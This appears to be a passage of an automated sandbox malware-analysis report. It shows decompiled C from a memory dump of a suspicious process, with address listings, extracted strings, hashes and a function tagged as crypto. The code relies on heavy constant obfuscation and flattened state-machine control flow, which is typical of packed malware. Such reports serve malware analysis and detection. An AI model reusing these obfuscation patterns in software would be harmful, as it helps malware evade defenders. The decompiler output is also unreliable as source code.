				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				void* _t365;
				intOrPtr _t367;
				signed int _t379;
				void* _t380;
				void* _t399;
				intOrPtr _t402;
				signed int _t408;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t416;
				signed int* _t417;
				void* _t419;

				_t417 =  &_v1212;
				_v1164 = 0xe848;
				_v1164 = _v1164 << 0xc;
				_t380 = 0xeb1d0fe;
				_v1164 = _v1164 << 2;
				_v1164 = _v1164 ^ 0x3a120029;
				_v1196 = 0xb50a;
				_v1196 = _v1196 * 0x54;
				_v1196 = _v1196 << 1;
				_v1196 = _v1196 << 0xc;
				_v1196 = _v1196 ^ 0x6ce97179;
				_v1072 = 0xa1a9;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 ^ 0x00006740;
				_v1112 = 0x5ab8;
				_v1112 = _v1112 | 0xd40f1486;
				_v1112 = _v1112 ^ 0xd40f3c8d;
				_v1168 = 0x99b2;
				_v1168 = _v1168 ^ 0x8e209920;
				_v1168 = _v1168 + 0x17b0;
				_v1168 = _v1168 + 0xffff252c;
				_v1168 = _v1168 ^ 0x8e1f3ab7;
				_v1108 = 0x6700;
				_v1108 = _v1108 ^ 0xd74b138d;
				_v1108 = _v1108 ^ 0xd74b4d2a;
				_v1116 = 0xa6d3;
				_v1116 = _v1116 << 0xc;
				_v1116 = _v1116 ^ 0x0a6d47ef;
				_v1144 = 0x46d4;
				_v1144 = _v1144 | 0x60392883;
				_t411 = 0x3e;
				_v1052 = _v1052 & 0x00000000;
				_v1144 = _v1144 / _t411;
				_v1144 = _v1144 ^ 0x018d3ef5;
				_v1212 = 0x195d;
				_v1212 = _v1212 + 0x9a8f;
				_v1212 = _v1212 >> 2;
				_v1212 = _v1212 >> 0xf;
				_v1212 = _v1212 ^ 0x00005610;
				_v1092 = 0x8c48;
				_v1092 = _v1092 | 0x14bcb660;
				_v1092 = _v1092 ^ 0x14bcd719;
				_v1184 = 0xdf30;
				_v1184 = _v1184 | 0x71150163;
				_v1184 = _v1184 + 0xffff3ca6;
				_v1184 = _v1184 >> 5;
				_v1184 = _v1184 ^ 0x03888299;
				_v1100 = 0xf0a2;
				_v1100 = _v1100 >> 2;
				_v1100 = _v1100 ^ 0x00007018;
				_v1076 = 0xde4e;
				_v1076 = _v1076 * 0x25;
				_v1076 = _v1076 ^ 0x0020254d;
				_v1084 = 0x8f7c;
				_v1084 = _v1084 + 0x3023;
				_v1084 = _v1084 ^ 0x00008967;
				_v1136 = 0x4c3;
				_v1136 = _v1136 + 0xbbe6;
				_v1136 = _v1136 | 0x03b94668;
				_v1136 = _v1136 ^ 0x03b9f10c;
				_v1120 = 0xdab0;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x0003158f;
				_v1080 = 0xb6c1;
				_v1080 = _v1080 ^ 0x2339c7b2;
				_v1080 = _v1080 ^ 0x2339156d;
				_v1152 = 0xaa63;
				_v1152 = _v1152 | 0x7d17af71;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x7af75802;
				_v1088 = 0x49a;
				_v1088 = _v1088 >> 9;
				_v1088 = _v1088 ^ 0x00004f36;
				_v1192 = 0x2678;
				_v1192 = _v1192 + 0xb679;
				_v1192 = _v1192 << 0x10;
				_v1192 = _v1192 + 0xffff3370;
				_v1192 = _v1192 ^ 0xdcf068a3;
				_v1064 = 0xeafb;
				_v1064 = _v1064 << 1;
				_v1064 = _v1064 ^ 0x00019538;
				_v1096 = 0x88f8;
				_t412 = 0x34;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x002a1ade;
				_v1132 = 0xf8dd;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 * 6;
				_v1132 = _v1132 ^ 0x2ea92e25;
				_v1148 = 0xb66c;
				_v1148 = _v1148 * 0x79;
				_v1148 = _v1148 * 0x37;
				_v1148 = _v1148 ^ 0x12863225;
				_v1044 = 0x2ced;
				_v1044 = _v1044 | 0x6c1d274b;
				_v1044 = _v1044 ^ 0x6c1d554c;
				_v1104 = 0xd4fb;
				_v1104 = _v1104 + 0xc222;
				_v1104 = _v1104 ^ 0x0001c0a4;
				_v1140 = 0xeff1;
				_v1140 = _v1140 | 0x2c578e17;
				_v1140 = _v1140 ^ 0x1f5808a8;
				_v1140 = _v1140 ^ 0x330f90e2;
				_v1156 = 0x54a4;
				_v1156 = _v1156 ^ 0xe69aec3e;
				_v1156 = _v1156 ^ 0x7a062859;
				_v1156 = _v1156 ^ 0x9c9c8f10;
				_v1180 = 0xa2be;
				_v1180 = _v1180 / _t412;
				_v1180 = _v1180 << 0xb;
				_v1180 = _v1180 << 6;
				_v1180 = _v1180 ^ 0x0642737d;
				_v1204 = 0x65ae;
				_v1204 = _v1204 + 0xb2b7;
				_v1204 = _v1204 + 0xbb73;
				_v1204 = _v1204 << 6;
				_v1204 = _v1204 ^ 0x0074b164;
				_v1176 = 0x3ecd;
				_v1176 = _v1176 | 0x1d534930;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 ^ 0x842f9ee3;
				_v1176 = _v1176 ^ 0xc9d04901;
				_v1056 = 0xf360;
				_v1056 = _v1056 | 0x93122b66;
				_v1056 = _v1056 ^ 0x9312fd26;
				_v1124 = 0x4a26;
				_v1124 = _v1124 | 0x286a3d77;
				_v1124 = _v1124 ^ 0x286a2522;
				_v1060 = 0x57ed;
				_v1060 = _v1060 + 0x784b;
				_v1060 = _v1060 ^ 0x0000c3a5;
				_v1068 = 0x69c7;
				_v1068 = _v1068 << 5;
				_v1068 = _v1068 ^ 0x000d6de9;
				_v1208 = 0xffbd;
				_v1208 = _v1208 * 0x3d;
				_v1208 = _v1208 << 5;
				_v1208 = _v1208 + 0x87f5;
				_v1208 = _v1208 ^ 0x079ed184;
				_v1128 = 0x5d27;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x62edd6dc;
				_v1128 = _v1128 ^ 0x62ed9c54;
				_v1048 = 0x8776;
				_t413 = 0x1e;
				_t408 = _v1052;
				_v1048 = _v1048 * 0xc;
				_v1048 = _v1048 ^ 0x000959b7;
				_v1172 = 0x35cb;
				_t379 = _v1052;
				_v1172 = _v1172 / _t413;
				_v1172 = _v1172 | 0x92682d74;
				_v1172 = _v1172 ^ 0x346a72ec;
				_v1172 = _v1172 ^ 0xa6025f11;
				_v1188 = 0x8f0f;
				_t414 = 0x66;
				_t416 = _v1052;
				_v1188 = _v1188 / _t414;
				_v1188 = _v1188 << 5;
				_v1188 = _v1188 + 0x12e7;
				_v1188 = _v1188 ^ 0x00003fc5;
				_v1200 = 0x51b9;
				_v1200 = _v1200 | 0x17a7f9cb;
				_v1200 = _v1200 << 8;
				_v1200 = _v1200 | 0xe40f2208;
				_v1200 = _v1200 ^ 0xe7fffb08;
				_v1160 = 0x57cd;
				_v1160 = _v1160 + 0xffffc371;
				_v1160 = _v1160 ^ 0x54a04296;
				_v1160 = _v1160 ^ 0x54a059b8;
				while(1) {
					L1:
					_t399 = 0x5c;
					do {
						while(1) {
							L2:
							_t419 = _t380 - 0x21daabfe;
							if(_t419 > 0) {
								break;
							}
							if(_t419 == 0) {
								_t409 =  *0x24ca2c; // 0x5d8300
								_t410 = _t409 + 0x230;
								while(1) {
									__eflags =  *_t410 - _t399;
									if( *_t410 == _t399) {
										break;
									}
									_t410 = _t410 + 2;
									__eflags = _t410;
								}
								_t408 = _t410 + 2;
								_t380 = 0x3af90ff3;
								continue;
							}
							if(_t380 == 0x222340b) {
								E00235FB2(_v1208, _v1128, _t379);
								L27:
								return _v1052;
							}
							if(_t380 == 0x88778bb) {
								_t416 = E002354FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
								_t417 =  &(_t417[0x16]);
								__eflags = _t416;
								if(_t416 == 0) {
									_t380 = 0x222340b;
								} else {
									_t380 = 0x212fea65;
									_v1052 = 1;
								}
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 == 0xeb1d0fe) {
								_push(_t380);
								_push(_t380);
								E0023C6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
								_t417 =  &(_t417[7]);
								_t380 = 0x3304c1c2;
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 != 0x212fea65) {
								goto L24;
							}
							E002442DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
							_t417 =  &(_t417[4]);
							_t380 = 0x2e0be9f8;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x2e0be9f8;
						if(_t380 == 0x2e0be9f8) {
							E00235FB2(_v1060, _v1068, _t416);
							_t380 = 0x222340b;
							_t399 = 0x5c;
							goto L24;
						}
						__eflags = _t380 - 0x3304c1c2;
						if(__eflags == 0) {
							_push(_v1116);
							_t365 = E0024889D(0x24c930, _v1108, __eflags);
							_t367 =  *0x24ca2c; // 0x5d8300
							_t402 =  *0x24ca2c; // 0x5d8300
							E002329E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
							E00242025(_v1076, _t365, _v1084, _v1136);
							_t417 =  &(_t417[0xc]);
							_t380 = 0x21daabfe;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x3af90ff3;
						if(_t380 != 0x3af90ff3) {
							goto L24;
						}
						_t379 = E00232959(_t380, _v1120, _v1080, _v1152, _v1048);
						_t417 =  &(_t417[4]);
						__eflags = _t379;
						if(_t379 == 0) {
							goto L27;
						}
						_t380 = 0x88778bb;
						goto L1;
						L24:
						__eflags = _t380 - 0x27fd7905;
					} while (_t380 != 0x27fd7905);
					goto L27;
				}
			}

0x0023d7eb
0x0023d7f1
0x0023d7fb
0x0023d800
0x0023d805
0x0023d80a
0x0023d812
0x0023d823
0x0023d827
0x0023d82b
0x0023d830
0x0023d838
0x0023d843
0x0023d84b
0x0023d856
0x0023d85e
0x0023d866
0x0023d86e
0x0023d876
0x0023d87e
0x0023d886
0x0023d88e
0x0023d896
0x0023d89e
0x0023d8a6
0x0023d8ae
0x0023d8b6
0x0023d8bb
0x0023d8c3
0x0023d8cb
0x0023d8d9
0x0023d8dc
0x0023d8e4
0x0023d8e8
0x0023d8f0
0x0023d8f8
0x0023d900
0x0023d905
0x0023d90a
0x0023d912
0x0023d91d
0x0023d928
0x0023d933
0x0023d93b
0x0023d943
0x0023d94b
0x0023d950
0x0023d958
0x0023d963
0x0023d96b
0x0023d976
0x0023d989
0x0023d990
0x0023d99b
0x0023d9a6
0x0023d9b1
0x0023d9bc
0x0023d9c4
0x0023d9cc
0x0023d9d4
0x0023d9dc
0x0023d9e4
0x0023d9e9
0x0023d9f1
0x0023d9fc
0x0023da07
0x0023da12
0x0023da1a
0x0023da22
0x0023da27
0x0023da2f
0x0023da3a
0x0023da42
0x0023da4f
0x0023da57
0x0023da5f
0x0023da64
0x0023da6c
0x0023da74
0x0023da7f
0x0023da86
0x0023da91
0x0023daa6
0x0023daa7
0x0023daae
0x0023dab9
0x0023dac1
0x0023dacb
0x0023dacf
0x0023dad7
0x0023dae4
0x0023daed
0x0023daf1
0x0023daf9
0x0023db04
0x0023db0f
0x0023db1a
0x0023db22
0x0023db2a
0x0023db32
0x0023db3a
0x0023db42
0x0023db4a
0x0023db52
0x0023db5a
0x0023db62
0x0023db6a
0x0023db72
0x0023db80
0x0023db84
0x0023db89
0x0023db8e
0x0023db96
0x0023db9e
0x0023dba6
0x0023dbae
0x0023dbb3
0x0023dbbb
0x0023dbc3
0x0023dbcb
0x0023dbd0
0x0023dbd8
0x0023dbe0
0x0023dbeb
0x0023dbf6
0x0023dc01
0x0023dc09
0x0023dc11
0x0023dc19
0x0023dc24
0x0023dc2f
0x0023dc3a
0x0023dc45
0x0023dc4d
0x0023dc58
0x0023dc65
0x0023dc69
0x0023dc6e
0x0023dc76
0x0023dc7e
0x0023dc86
0x0023dc8b
0x0023dc93
0x0023dc9b
0x0023dcb2
0x0023dcb5
0x0023dcbc
0x0023dcc3
0x0023dcce
0x0023dcde
0x0023dce5
0x0023dce9
0x0023dcf1
0x0023dcf9
0x0023dd01
0x0023dd0d
0x0023dd10
0x0023dd17
0x0023dd1b
0x0023dd20
0x0023dd28
0x0023dd30
0x0023dd38
0x0023dd40
0x0023dd45
0x0023dd4d
0x0023dd55
0x0023dd5d
0x0023dd65
0x0023dd6d
0x0023dd75
0x0023dd75
0x0023dd77
0x0023dd78
0x0023dd78
0x0023dd78
0x0023dd78
0x0023dd7e
0x00000000
0x00000000
0x0023dd84
0x0023de9f
0x0023dea5
0x0023deb0
0x0023deb0
0x0023deb3
0x00000000
0x00000000
0x0023dead
0x0023dead
0x0023dead
0x0023deb5
0x0023deb8
0x00000000
0x0023deb8
0x0023dd90
0x0023dfca
0x0023dfd0
0x0023dfe1
0x0023dfe1
0x0023dd9c
0x0023de77
0x0023de79
0x0023de7c
0x0023de7e
0x0023de95
0x0023de80
0x0023de80
0x0023de85
0x0023de85
0x0023dd75
0x0023dd75
0x0023dd77
0x00000000
0x0023dd77
0x0023dd75
0x0023dda4
0x0023ddd7
0x0023ddd8
0x0023ddfc
0x0023de01
0x0023de04
0x0023dd75
0x0023dd75
0x0023dd77
0x00000000
0x0023dd77
0x0023dd75
0x0023ddac
0x00000000
0x00000000
0x0023ddc8
0x0023ddcd
0x0023ddd0
0x0023dd75
0x0023dd75
0x0023dd77
0x00000000
0x0023dd77
0x0023dd75
0x0023dec2
0x0023dec8
0x0023dfa5
0x0023dfad
0x0023dfb2
0x00000000
0x0023dfb2
0x0023dece
0x0023ded4
0x0023df14
0x0023df21
0x0023df42
0x0023df5c
0x0023df68
0x0023df84
0x0023df89
0x0023df8c
0x0023dd75
0x0023dd75
0x0023dd77
0x00000000
0x0023dd77
0x0023dd75
0x0023ded6
0x0023dedc
0x00000000
0x00000000
0x0023defd
0x0023deff
0x0023df02
0x0023df04
0x00000000
0x00000000
0x0023df0a
0x00000000
0x0023dfb3
0x0023dfb3
0x0023dfb3
0x00000000
0x0023dfbf

Strings

H, xrefs: 0023D7F1
rj4, xrefs: 0023DCF1
6O, xrefs: 0023DA42
m, xrefs: 0023DC4D
Gm, xrefs: 0023D8BB
), xrefs: 0023D80A
,, xrefs: 0023DAF9
yql, xrefs: 0023D830
'], xrefs: 0023DC7E
"%j(, xrefs: 0023DC11
M% , xrefs: 0023D990
#0, xrefs: 0023D9A6
e/!, xrefs: 0023DDA6
Kx, xrefs: 0023DC24
e/!, xrefs: 0023DE80
@g, xrefs: 0023D84B
x&, xrefs: 0023DA4F

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
API String ID: 0-131801274
Opcode ID: 61fbbcd455303a2ad308e7192a3d92a0ad205c5b633f39f3807cce9f6adba335
Instruction ID: f0652c60c2030b04f56ac6c6b72ec14c1f32b52df568f1e03542b88ce1f96c4f
Opcode Fuzzy Hash: 61fbbcd455303a2ad308e7192a3d92a0ad205c5b633f39f3807cce9f6adba335
Instruction Fuzzy Hash: 9A0213B1119380DFE369CF61D58AA5BBBF1FBC5708F10891DE29A86260C7B58958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0023F98C, Relevance: 20.4, Strings: 16, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0023F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				void* __ecx;
				void* _t344;
				void* _t374;
				signed int _t377;
				intOrPtr _t391;
				void* _t392;
				intOrPtr _t393;
				signed int _t395;
				intOrPtr _t396;
				signed int _t397;
				intOrPtr* _t401;
				intOrPtr _t403;
				intOrPtr* _t416;
				char* _t448;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				char* _t460;
				void* _t461;
				intOrPtr* _t468;
				void* _t470;
				void* _t472;

				_t401 = _a4;
				_push(_a16);
				_t468 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_t401);
				_push(__edx);
				E0023602B(_t344);
				_v180 = 0x2a54;
				_t470 =  &_v268 + 0x18;
				_v180 = _v180 ^ 0xdbb28899;
				_t403 = 0;
				_t461 = 0x405be48;
				_v268 = 0;
				_t450 = 0x55;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0xa04911e4;
				_v164 = 0x788;
				_v164 = _v164 * 0x79;
				_v164 = _v164 ^ 0x00038f4a;
				_v260 = 0xdd03;
				_v260 = _v260 ^ 0x82285f25;
				_v260 = _v260 >> 7;
				_v260 = _v260 << 4;
				_v260 = _v260 ^ 0x104552fc;
				_v132 = 0x81fa;
				_v132 = _v132 | 0x4b6553e1;
				_v132 = _v132 ^ 0x4b658f00;
				_v208 = 0xbd69;
				_t451 = 0x73;
				_v208 = _v208 / _t450;
				_v208 = _v208 + 0x56ba;
				_v208 = _v208 ^ 0x000029ec;
				_v156 = 0x625a;
				_v156 = _v156 + 0xffff65b2;
				_v156 = _v156 ^ 0xffffa807;
				_v176 = 0xc378;
				_v176 = _v176 >> 1;
				_v176 = _v176 + 0x1919;
				_v176 = _v176 ^ 0x00004408;
				_v228 = 0xbfad;
				_v228 = _v228 + 0xffff004b;
				_v228 = _v228 / _t451;
				_t452 = 0x16;
				_v228 = _v228 / _t452;
				_v228 = _v228 ^ 0x0019c242;
				_v264 = 0x218a;
				_v264 = _v264 | 0xaefe0d97;
				_v264 = _v264 + 0x77f0;
				_v264 = _v264 + 0xffffbecb;
				_v264 = _v264 ^ 0xaefe1c0e;
				_v152 = 0x1773;
				_v152 = _v152 + 0x7c73;
				_v152 = _v152 ^ 0x000090c4;
				_v140 = 0xfcb3;
				_v140 = _v140 + 0xffff1dd8;
				_v140 = _v140 ^ 0x00004a86;
				_v252 = 0x9e2f;
				_t453 = 9;
				_v252 = _v252 / _t453;
				_v252 = _v252 << 0xc;
				_v252 = _v252 + 0x6e7b;
				_v252 = _v252 ^ 0x01198ad6;
				_v136 = 0x978d;
				_v136 = _v136 << 0xb;
				_v136 = _v136 ^ 0x04bc6438;
				_v144 = 0xf0b5;
				_t454 = 0x79;
				_v144 = _v144 * 0x51;
				_v144 = _v144 ^ 0x004c2c51;
				_v224 = 0xa482;
				_v224 = _v224 ^ 0xc585cea3;
				_v224 = _v224 / _t454;
				_v224 = _v224 ^ 0x01a18743;
				_v148 = 0xd0a0;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x000025e7;
				_v232 = 0xead1;
				_v232 = _v232 ^ 0xc3cfbc77;
				_v232 = _v232 | 0xf3c428cf;
				_v232 = _v232 + 0xffff938a;
				_v232 = _v232 ^ 0xf3cf35e7;
				_v160 = 0xb488;
				_v160 = _v160 + 0xf6e2;
				_v160 = _v160 ^ 0x0001c37e;
				_v212 = 0xc903;
				_t455 = 0x1e;
				_v212 = _v212 / _t455;
				_v212 = _v212 ^ 0xfd3886ab;
				_v212 = _v212 ^ 0xfd38fa88;
				_v196 = 0xdd05;
				_v196 = _v196 << 5;
				_v196 = _v196 + 0xdc4b;
				_v196 = _v196 ^ 0x001c7bd6;
				_v200 = 0x4db0;
				_v200 = _v200 ^ 0x1a7afaec;
				_v200 = _v200 >> 8;
				_v200 = _v200 ^ 0x001a5e83;
				_v240 = 0x9d3f;
				_v240 = _v240 >> 8;
				_v240 = _v240 << 9;
				_v240 = _v240 + 0x917a;
				_v240 = _v240 ^ 0x0001a611;
				_v256 = 0x4a86;
				_v256 = _v256 >> 0xd;
				_t456 = 0x55;
				_v256 = _v256 * 0x35;
				_v256 = _v256 + 0xffffab30;
				_v256 = _v256 ^ 0xffffb251;
				_v204 = 0x386;
				_v204 = _v204 / _t456;
				_v204 = _v204 ^ 0xc8309f8e;
				_v204 = _v204 ^ 0xc830cb09;
				_v172 = 0x8769;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x00003b2d;
				_v244 = 0x2b5b;
				_v244 = _v244 + 0xb0ca;
				_v244 = _v244 + 0xd805;
				_v244 = _v244 << 2;
				_v244 = _v244 ^ 0x0006bd06;
				_v184 = 0x1527;
				_v184 = _v184 | 0xeeea078d;
				_t457 = 0x28;
				_v184 = _v184 / _t457;
				_v184 = _v184 ^ 0x05f92fca;
				_v192 = 0x11fc;
				_t458 = 0x16;
				_v192 = _v192 / _t458;
				_v192 = _v192 ^ 0x8895e54e;
				_v192 = _v192 ^ 0x8895ebcd;
				_v168 = 0xe011;
				_v168 = _v168 + 0x4c50;
				_v168 = _v168 ^ 0x0001058b;
				_v216 = 0xf07;
				_t459 = 0x32;
				_v216 = _v216 * 0x36;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x00008949;
				_v248 = 0xde23;
				_v248 = _v248 + 0xecd9;
				_v248 = _v248 << 0xd;
				_v248 = _v248 ^ 0x1d8b17f5;
				_v248 = _v248 ^ 0x24d4a8d4;
				_v220 = 0x3854;
				_v220 = _v220 | 0x09b0f0f7;
				_v220 = _v220 + 0xe63e;
				_v220 = _v220 ^ 0x09b1b8f3;
				_v188 = 0x295e;
				_v188 = _v188 * 0x23;
				_v188 = _v188 / _t459;
				_v188 = _v188 ^ 0x00001cf4;
				_t460 = _v124;
				while(1) {
					L1:
					_t441 = _v236;
					while(1) {
						L2:
						_t472 = _t461 - 0x299f8b6c;
						if(_t472 <= 0) {
							break;
						}
						if(_t461 == 0x2e2d51e6) {
							_v124 = 0x14;
							_t374 = E0023F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
							_t403 = _v268;
							_t470 = _t470 + 0x1c;
							_t441 = _v236;
							if(_t374 == 0) {
								continue;
							}
							_t461 = 0x8f3e942;
							_t403 = 1;
							_v268 = 1;
							L29:
							if(_t461 == 0x33ec2607) {
								L33:
								return _v268;
							}
							while(1) {
								L1:
								_t441 = _v236;
								goto L2;
							}
						}
						if(_t461 == 0x2e332bc4) {
							E00242674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
							_t470 = _t470 + 0x14;
							_t461 = 0x2452d659;
							L9:
							_t403 = _v268;
							goto L1;
						}
						if(_t461 == 0x2efa85f7) {
							_t377 = _a4 + 1;
							if((_t377 & 0x0000000f) != 0) {
								_t377 = (_t377 & 0xfffffff0) + 0x10;
							}
							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
							_push(_t403);
							_push(_t403);
							_t460 = E00238736( *((intOrPtr*)(_t401 + 4)));
							 *_t401 = _t460;
							if(_t460 == 0) {
								goto L33;
							} else {
								_t317 = _t460 + 0x74; // 0x74
								_t441 = _t317;
								_v116 = _a4;
								_t461 = 0x332cf2c2;
								_t403 = _v268;
								_v236 = _t317;
								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
								continue;
							}
						}
						if(_t461 != 0x332cf2c2) {
							goto L29;
						}
						_t396 =  *0x24ca20; // 0x0
						_t397 = E00241B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
						_t470 = _t470 + 0x14;
						asm("sbb esi, esi");
						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
						goto L9;
					}
					if(_t472 == 0) {
						if(_t403 == 0) {
							E0023F536(_v156, _v176, _v228,  *_t401);
						}
						goto L33;
					}
					if(_t461 == 0x405be48) {
						_t461 = 0x2efa85f7;
						goto L2;
					}
					if(_t461 == 0x8f3e942) {
						_push(_t403);
						_push(_t403);
						E00235F43(_t403, _v128);
						_t461 = 0x299f8b6c;
						goto L9;
					}
					if(_t461 == 0x1e33600c) {
						_v112 = 0x6c;
						_t391 =  *0x24ca20; // 0x0
						_t392 = E00238010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
						_t470 = _t470 + 0x20;
						if(_t392 == 0) {
							_t461 = 0x8f3e942;
							goto L9;
						}
						_t416 =  &_v1;
						_t448 = _t460;
						do {
							 *_t448 =  *_t416;
							_t448 = _t448 + 1;
							_t416 = _t416 - 1;
						} while (_t416 >=  &_v96);
						_t461 = 0x2e2d51e6;
						goto L9;
					}
					if(_t461 != 0x2452d659) {
						goto L29;
					}
					_t393 =  *0x24ca20; // 0x0
					_t395 = E00240A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
					_t470 = _t470 + 0x2c;
					asm("sbb esi, esi");
					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
					goto L9;
				}
			}

0x0023f993
0x0023f99d
0x0023f9a4
0x0023f9a6
0x0023f9ad
0x0023f9b4
0x0023f9b5
0x0023f9b7
0x0023f9bc
0x0023f9c7
0x0023f9ca
0x0023f9d9
0x0023f9db
0x0023f9e0
0x0023f9e6
0x0023f9e9
0x0023f9ed
0x0023f9f5
0x0023fa02
0x0023fa06
0x0023fa0e
0x0023fa16
0x0023fa1e
0x0023fa23
0x0023fa28
0x0023fa30
0x0023fa3b
0x0023fa46
0x0023fa51
0x0023fa5f
0x0023fa60
0x0023fa66
0x0023fa6e
0x0023fa76
0x0023fa81
0x0023fa8c
0x0023fa97
0x0023fa9f
0x0023faa3
0x0023faab
0x0023fab3
0x0023fabb
0x0023facb
0x0023fad5
0x0023fada
0x0023fade
0x0023fae6
0x0023faee
0x0023faf6
0x0023fafe
0x0023fb06
0x0023fb0e
0x0023fb19
0x0023fb24
0x0023fb2f
0x0023fb3a
0x0023fb45
0x0023fb52
0x0023fb5e
0x0023fb63
0x0023fb69
0x0023fb6e
0x0023fb76
0x0023fb7e
0x0023fb89
0x0023fb91
0x0023fb9c
0x0023fbaf
0x0023fbb2
0x0023fbb9
0x0023fbc4
0x0023fbcc
0x0023fbdc
0x0023fbe0
0x0023fbe8
0x0023fbf3
0x0023fbfa
0x0023fc05
0x0023fc0d
0x0023fc15
0x0023fc1d
0x0023fc25
0x0023fc2d
0x0023fc38
0x0023fc43
0x0023fc4e
0x0023fc5a
0x0023fc5f
0x0023fc65
0x0023fc6d
0x0023fc75
0x0023fc7d
0x0023fc82
0x0023fc8a
0x0023fc92
0x0023fc9a
0x0023fca2
0x0023fca7
0x0023fcaf
0x0023fcb7
0x0023fcbc
0x0023fcc1
0x0023fcc9
0x0023fcd1
0x0023fcd9
0x0023fce3
0x0023fce4
0x0023fce8
0x0023fcf0
0x0023fcf8
0x0023fd06
0x0023fd0a
0x0023fd12
0x0023fd1a
0x0023fd22
0x0023fd27
0x0023fd2f
0x0023fd37
0x0023fd3f
0x0023fd47
0x0023fd4c
0x0023fd54
0x0023fd5c
0x0023fd6c
0x0023fd71
0x0023fd77
0x0023fd7f
0x0023fd8b
0x0023fd90
0x0023fd96
0x0023fd9e
0x0023fda6
0x0023fdae
0x0023fdb6
0x0023fdbe
0x0023fdcb
0x0023fdcc
0x0023fdd0
0x0023fdd5
0x0023fddd
0x0023fde5
0x0023fded
0x0023fdf2
0x0023fdfa
0x0023fe02
0x0023fe0a
0x0023fe12
0x0023fe1a
0x0023fe22
0x0023fe2f
0x0023fe39
0x0023fe3d
0x0023fe45
0x0023fe4c
0x0023fe4c
0x0023fe4c
0x0023fe50
0x0023fe50
0x0023fe50
0x0023fe56
0x00000000
0x00000000
0x0023ff96
0x0024009f
0x002400ca
0x002400cf
0x002400d3
0x002400d6
0x002400dc
0x00000000
0x00000000
0x002400e4
0x002400e9
0x002400ea
0x002400ee
0x002400f4
0x00240117
0x00240125
0x00240125
0x0023fe4c
0x0023fe4c
0x0023fe4c
0x00000000
0x0023fe4c
0x0023fe4c
0x0023ffa2
0x00240082
0x00240087
0x0024008a
0x0023fee7
0x0023fee7
0x00000000
0x0023fee7
0x0023ffae
0x00240001
0x00240004
0x00240009
0x00240009
0x0024000f
0x00240021
0x00240022
0x0024002b
0x0024002d
0x00240033
0x00000000
0x00240039
0x0024003c
0x0024003c
0x00240045
0x0024004c
0x00240051
0x00240055
0x00240059
0x00000000
0x00240059
0x00240033
0x0023ffb6
0x00000000
